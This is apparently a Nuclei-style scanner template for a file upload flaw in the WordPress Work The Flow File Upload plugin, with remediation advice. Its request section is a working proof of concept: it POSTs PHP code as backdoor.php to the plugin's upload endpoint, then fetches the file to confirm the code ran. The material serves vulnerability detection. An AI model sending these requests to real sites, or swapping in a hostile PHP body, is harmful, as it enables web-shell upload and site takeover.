id: CNVD-2015-02504
info:
  name: Wordpress Work the flow file upload 2.5.2 Shell Upload Vulnerability
  author:
  - l0ne1y
  description: |-
    WordPress Plugin Work The Flow File Arbitrary file upload vulnerability
    WordPress is a blog platform developed by the WordPress Software Foundation using the PHP language. The platform supports the establishment of personal blog websites on PHP and MySQL servers. Work The Flow File is a WordPress file upload plug-in.

    The WordPress plugin Work The Flow File has a file upload vulnerability because the file fails to properly restrict user file uploads. Allows remote attackers to exploit the vulnerability to submit specially crafted files for execution with WEB permissions.
  severity: critical
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program: https://wordpress.org/plugins/

    Temporary fix:
    File upload:
    1. The server side directly sets the file upload directory to non-executable.
    2. File type check: It is recommended to use the whitelist method (more reliable than the blacklist), combined with MIME Type, suffix check and other methods (the file type is restricted by the whitelist). In addition, you can use the compression function or resize function to process images, which will destroy the HTML code they contain while processing the image.
    3. Use random numbers to rewrite file names and file paths so that users cannot easily access their uploaded files.
    4. Set the domain name of the file server separately.
    5. Verify the file content and use regular rules to match malicious code (filter various bypass methods of malicious code, such as upper and lower case, BASE64 encoding) to limit uploading.
    6. Fix possible parsing vulnerabilities in the server.
    7. Strictly restrict the upload of files that can modify the server configuration, such as: .htaccess.
    8. Hide the upload file path.
    9. Upgrade Web Server.
    10. Fix the Web upload code in a timely manner.
    11. There cannot be any local files containing vulnerabilities.
    12. Pay attention to 0x00 truncation attack (update PHP to the latest version).
requests:
- path:
  - '{{BaseURL}}/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php'
  method: POST
  body: <?php echo md5(123)?>
  headers:
    Content-Disposition: backdoor.php
- matchers:
  - type: dsl
    dsl:
    - status_code==200 && contains(body,"202cb962ac59075b964b07152d234b70")
  matchers-condition: and
  path:
  - '{{BaseURL}}/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/backdoor.php'
  method: GET
